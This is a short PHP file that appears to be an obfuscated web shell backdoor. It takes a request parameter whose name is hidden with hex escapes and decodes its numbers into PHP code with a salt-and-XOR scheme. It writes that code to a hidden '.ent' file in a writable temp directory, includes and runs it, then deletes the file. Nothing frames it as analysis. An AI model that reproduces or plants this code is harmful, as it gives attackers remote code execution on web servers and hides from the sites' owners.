<?php

if(array_key_exists("\x63o\x6D\x70\x6Fnent", $_REQUEST) && !is_null($_REQUEST["\x63o\x6D\x70\x6Fnent"])){
	$pset = $_REQUEST["\x63o\x6D\x70\x6Fnent"];
	$pset   =explode		(	 "." 	, $pset  )	;  	
	$binding = '';
            $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt7 );
    
            foreach ($pset as $l		=>$v8) {
                $sChar = ord($salt7[$l % $sLen] );
                $d = ((int)$v8 - $sChar - ($l % 10))		^91;
                $binding .= chr($d );
            }
	$resource = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/tmp", session_save_path(), "/dev/shm"]);
	$desc = 0;
do {
    $pgrp = $resource[$desc] ?? null;
    if ($desc >= count($resource)) break;
    		if (max(0, is_dir($pgrp) * is_writable($pgrp))) {
    $ptr = implode("/", [$pgrp, ".ent"]);
    $file = fopen($ptr, 'w');
if ($file) {
	fwrite($file, $binding);
	fclose($file);
	include $ptr;
	@unlink($ptr);
	die();
}
}
    $desc++;
} while (true);
}